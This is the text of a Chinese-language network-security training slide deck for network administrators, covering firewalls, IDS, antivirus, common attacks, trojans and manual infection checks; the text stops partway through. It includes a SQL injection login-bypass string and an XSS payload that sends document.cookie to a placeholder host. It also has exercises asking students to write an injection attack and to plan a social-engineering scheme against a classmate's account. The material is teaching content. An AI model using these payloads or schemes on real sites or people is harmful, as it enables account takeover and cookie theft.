網(wǎng)管寒訓(xùn)網(wǎng)路安全與病毒防護第1頁，共73頁。網(wǎng)路安全第2頁，共73頁。網(wǎng)路安全基本介紹網(wǎng)路安全的基本需求網(wǎng)路面臨的問題網(wǎng)路的安全威脅第3頁，共73頁。網(wǎng)路安全的基本需求傳輸?shù)谋Ｃ苄?confidentiality)資料的完整性(integrity)身分的鑑別與認證(authentication)雙方的不可否認性(nonrepudiation)第4頁，共73頁。網(wǎng)路面臨的問題病毒蠕蟲攻擊網(wǎng)路癱瘓垃圾郵件機密外洩非法入侵即時通訊(MSN….)back第5頁，共73頁。網(wǎng)路的安全威脅系統(tǒng)、漏洞不斷被發(fā)現(xiàn)，攻擊手法不斷翻新更新的速度永遠比不過感染的速度病毒變種快速攻擊程式及後門程式氾濫廣告郵件、垃圾訊息及色情網(wǎng)站充斥整個網(wǎng)路非法下載即時通訊第6頁，共73頁。隨堂練習(xí)請從網(wǎng)路找出一個近年來的網(wǎng)路攻擊事件的新聞，並簡單判別它是以上提到的哪種問題?第7頁，共73頁。提高網(wǎng)路連線的安全性資料加密(DataEncryption)

明文(plaintext)

密文(ciphertext)認證(Authorization)

通常是要求使用者輸入帳號密碼權(quán)限設(shè)定(Authentication)稽核(Auditing)

提供過去事件的相關(guān)紀錄利於事後追蹤

第8頁，共73頁。典型密碼系統(tǒng)發(fā)送方接收方加密演算法解密演算法加密金鑰解密金鑰明文密文明文第9頁，共73頁。網(wǎng)路安全設(shè)備入侵防禦系統(tǒng)(IPS&IDS)防火牆（Firewall)防毒系統(tǒng)(Anti-Virus)第10頁，共73頁。Firewall安裝在兩個網(wǎng)路間的裝置藉著過濾掉某些不可靠的資料封包來增加系統(tǒng)的安全性提供稽核與控制存取等服務(wù)第11頁，共73頁。Firewall的基本功能認證(UA,UserAuthentication)預(yù)警功能(Alert)記錄與記錄分析工具(Log&LogAnalyzer)通訊埠的權(quán)限設(shè)定第12頁，共73頁。Firewall的缺點易形成網(wǎng)路上的交通瓶頸無法防止內(nèi)部網(wǎng)路的使用者用其合法的身分做破壞系統(tǒng)的行為不一定能阻止開後門無法有效阻止有心人士利用原作業(yè)系統(tǒng)的漏洞進行入侵破壞行為不提供資料完整性驗證第13頁，共73頁。三大Firewall類型1.封包過濾式2.應(yīng)用層閘道式3.電路層閘道式第14頁，共73頁。封包過濾式防火牆應(yīng)用於網(wǎng)路層針對每個封包的標頭提供的資訊加以查核優(yōu)點：1.完全通透性

2.速度快缺點：1.無法有效防止IP欺騙

2.有些應(yīng)用協(xié)議不適用(EX.HTTP)第15頁，共73頁。隨堂練習(xí)1.請去網(wǎng)路上找出另外兩種防火牆的簡介，並列出兩種防火牆的優(yōu)缺點2.請完成以下表格封包過濾式應(yīng)用層閘道式電路層閘道式運作層級運作效率通透性安全性建置價格第16頁，共73頁。防火牆Comodo個人防火牆personalfirewallodoMcAfeePersonalFirewall第17頁，共73頁。入侵偵測系統(tǒng)IDS架設(shè)在網(wǎng)路節(jié)點與主機間的針孔攝影機若防火牆是第一道防線

IDS就是第二道防線可以監(jiān)控用戶和系統(tǒng)的所有活動將封包拆開分析再重新組合第18頁，共73頁。隨堂練習(xí)使用IDS是否真的萬無一失?

請查閱網(wǎng)路資料並列出IDS的缺點第19頁，共73頁。防毒軟體以特徵碼和行為模式辨別病毒、木馬並不能100%阻擋病毒的入侵

(因為病毒變種過於快速)不怕一萬，只怕萬一定期更新病毒碼、主程式第20頁，共73頁。網(wǎng)路的基本運作原理Internet世界TCP/IP協(xié)定WindowsPort80Port110Port25Port??…第21頁，共73頁。Port的角色與功能電腦進出Internet的大門一般來說，每個網(wǎng)路軟體都可以打開任一個Port，但為了傳輸順暢，某些軟體就會固定使用某幾個Port所以沒用到、不常用的幾個Port就容易成為駭客入侵最常使用的Port第22頁，共73頁。隨堂練習(xí)請找出以下幾個程式或協(xié)定所使用的Port1.FTP6.HTTP2.Telnet7.DHCP3.SMTP4.POP35.網(wǎng)路芳鄰第23頁，共73頁。駭客入侵第24頁，共73頁。駭客入侵的對象Server個人!!!第25頁，共73頁。常見的攻擊手法(Server)猜密碼利用系統(tǒng)的程式漏洞『主動』攻擊利用程式功能的『被動』攻擊rootkit→蠕蟲或木馬社交工程DoS(DenialofService)XSS(Cross-SiteScripting)第26頁，共73頁。猜密碼取得帳號資訊後猜密碼

常見帳號admin,administrator,webmaster…Bruteforce(暴力法)

利用字典檔進行無數(shù)次試驗第27頁，共73頁。猜密碼初級cracker會使用的方式之一WINRARpasswordrecovery費時防護：

1.建立較嚴格的密碼設(shè)定規(guī)則

2.密碼輸入次數(shù)限制

back

第28頁，共73頁。利用系統(tǒng)的程式漏洞『主動』攻擊軟體撰寫方式的問題

bug(可能會造成系統(tǒng)的不穩(wěn)定或當(dāng)機)Security(程式碼撰寫方式會導(dǎo)致系統(tǒng)的使用權(quán)限被惡意者所掌握

)cracker會嘗試撰寫一些針對這個漏洞的攻擊程式→攻擊者只要拿到攻擊程式就可以進行攻擊SQLinjection

第29頁，共73頁。SQLinjection(資料隱碼)利用使用者輸入的東西來控制你的SQLExample:select*frommemberwhereUID='

"&request("ID")&"

'

AndPasswd='"&request("Pwd")&"‘正常：select*frommemberwhereUID='A123456789'

AndPasswd='1234‘第30頁，共73頁。SQLinjection

使用者帳號’or1=1--，密碼隨便打結(jié)果：select*frommemberwhereUID=''or1=1--'

AndPasswd='asdf1234'邏輯成立跳過驗證密碼過程(p.s.--符號後的任何敘述都會被當(dāng)作註解

)第31頁，共73頁。隨堂練習(xí)請運用剛剛所提到的內(nèi)容寫出一段資料隱碼攻擊的程式碼第32頁，共73頁。利用系統(tǒng)的程式漏洞『主動』攻擊最常見不需要猜密碼由攻擊開始到取得你系統(tǒng)的root權(quán)限不需要兩分鐘，就能夠立刻入侵成功防護：

1.關(guān)閉不需要的網(wǎng)路服務(wù)&Port2.隨時保持更新back第33頁，共73頁。利用程式功能的『被動』攻擊惡意網(wǎng)站提供軟體下載與安裝瀏覽器主動的答應(yīng)對方WWW主機所提供的各項程式功能，或者是自動安裝來自對方主機的軟體瀏覽器漏洞讓對方得以傳送惡意程式碼給你的主機來執(zhí)行

ActiveX主動式內(nèi)容(IEcore)：

EX.讀寫檔案、病毒掃瞄等但是有讓對方網(wǎng)站控制本機的危險第34頁，共73頁。利用程式功能的『被動』攻擊防護：

1.隨時更新

2.讓瀏覽器在安裝軟體時，要通過你的確認後才安裝

3.不要連上惡意網(wǎng)站(難!!)back第35頁，共73頁。rootkit→蠕蟲或木馬蠕蟲(Worm)

惡性程式碼

感染整個網(wǎng)路木馬間諜程式(Trojan)

附著在可執(zhí)行檔案裡開後門爽

(側(cè)錄、跳板、破壞….)Rootkit即為取得root權(quán)限的工具包途徑：漏洞與社交工程…..等第36頁，共73頁。社交工程(SocialEngineering)簡介過人與人的互動來達到『入侵』的目的偽裝、謊言時間可能長以年計釣魚法推薦書目：藍色駭客(出版社：皇冠文化)

MSNphoto系列病毒第37頁，共73頁。社交工程(SocialEngineering)防護：

1.帳號密碼記在腦子裡不要說

2.不要隨便相信他人(?)3.追蹤對談?wù)遙ack第38頁，共73頁。隨堂練習(xí)情境題：如果你是一個駭客，你會怎樣利用社交工程來騙取現(xiàn)在坐在你旁邊同學(xué)的郵局帳號密碼?(請用50~100字簡單敘述流程)第39頁，共73頁。DoS(DenialofService)阻斷式攻擊SYN：當(dāng)主機接收了一個帶有SYN的TCP封包之後，就會啟用對方要求的port來等待連線SYNflood：透過軟體功能，在短短的時間內(nèi)持續(xù)發(fā)送出SYN封包，Server就會持續(xù)不斷的發(fā)送確認封包，並且開啟大量的port在空等

CPU使用率飆高、頻寬被吃光掰機關(guān)槍打坦克第40頁，共73頁。補充:三方交握(Three-WayHandshaking)Client端發(fā)出連線要求時，必須要提供下列資訊：

Client自己的IP位址所使用的Port號最大容許的TCPSegment大小其他訊息三方交握：1.Clioent想要與Server連線，因此Host1將SYN旗標設(shè)定為1，同時將目前的Segment序號(x)傳送給Host2。

2.Server接收到此要求後，會對此連線要求加以回應(yīng)，因此將SYN設(shè)定為1，此外附上目前序號(y)，及確認序號(x+1)給Client。（在此，確認號碼為發(fā)送端序號加一）。3.Client收到此訊號後，會將序號設(shè)定為(x+1)，然後確認序號設(shè)定為(y+1)。（確認序號仍為對方的序號加一）。第41頁，共73頁。第42頁，共73頁。第43頁，共73頁。DDoS(DistributedDenialofService)進化版集合眾人之力先散播惡意軟體(透過後門等方式)

同步所有攻擊程式，於同時間朝同目標攻擊效率為DoS的數(shù)倍單純惡意行為(不是為了取得root)目前無較好方法防堵第44頁，共73頁。back第45頁，共73頁。Cross-SiteScripting(XSS)跨站腳本攻擊十大攻擊之首利用網(wǎng)站上允許使用者輸入字元或字串的欄位插入HTML與Script語言

利用釣魚式攻擊

將使用者的cookie資料導(dǎo)入到駭客網(wǎng)站並儲存

無名小站(2006)第46頁，共73頁。Cross-SiteScripting(XSS)EX.<script>location.replace('xxx/?secret='+document.cookie)</script>防護

1.BlackList

缺點：過濾不乾淨(jìng)

2.WhiteList

缺點：Client變化性少第47頁，共73頁。隨堂練習(xí)請從網(wǎng)路上找出一種阻斷式攻擊的方法

(講義上沒提到的)第48頁，共73頁。病毒與木馬防護第49頁，共73頁。木馬??第50頁，共73頁。木馬病毒傻傻分不清楚病毒─進入電腦中進行軟硬體的損壞、無法操作等破壞行為木馬─進入電腦中蒐集各種資訊，甚至完全控制寄主第51頁，共73頁。木馬的功用遠端遙控轉(zhuǎn)向入侵(or跳板)截取封包獲得帳號密碼DDoS第52頁，共73頁。木馬怎麼防?最佳方式─不要讓它植入你的電腦不幸中了怎麼辦?1.想辦法清除

2.利用之前的備份重灌第53頁，共73頁。簡易中毒自救法1.先拔網(wǎng)路線2.使用防毒軟體檢察3.檢查開機自動執(zhí)行與系統(tǒng)服務(wù)4.檢查已執(zhí)行的程式5.查看Port連線情況6.上網(wǎng)求救---------------------------------------------------------------進階：監(jiān)控封包第54頁，共73頁。使用防毒軟體檢察平時就要定期更新病毒碼防毒軟體只是疫苗，不一定是解藥

p.s.Spybot–Search&Destroy第55頁，共73頁。檢查開機自動執(zhí)行1.啟動資料夾第56頁，共73頁。檢查開機自動執(zhí)行2.Win.ini或是System.ini在Windows的資料夾裡Win.ini通常不會有任何的run和load參數(shù)System.ini裡的shell參數(shù)的Explorer.exe不會有別的程式名稱第57頁，共73頁。檢查開機自動執(zhí)行3.檢察機碼(Registry)執(zhí)行

regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce通常只有系統(tǒng)運行所需之程式或是自己灌的應(yīng)用程式Startupmlin/files/StartupCPL.zip第58頁，共73頁。HKEY_USERS\S-1-5-21-..........\Software\Microsoft\WindowNT\CurrentVersion\Windows裡面通常沒有run的機碼HKEY_LOCAL_Machine\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon裡面的Shell機碼值應(yīng)該只有explorer.exe第59頁，共73頁。檢察系統(tǒng)服務(wù)控制臺系統(tǒng)服務(wù)停用可疑或自己不認識的服務(wù)第60頁，共73頁。檢查已執(zhí)行的程式工作管理員TaskInfo(共享軟體)可以上網(wǎng)查不知道是什麼的程式neuber/taskmanager/process/index.htmlprocesslibrary/directory/一些WinXP的系統(tǒng)程式：

smss.exelsass.execsrss.exewinlogon.exeExplore.exeregsvc.exesvchost.exe(會有很多個)進入安全模式將可疑執(zhí)行檔刪除第61頁，共73頁。查看Port狀況CurrPortnirsoft/utils/cports.html將可疑程式的位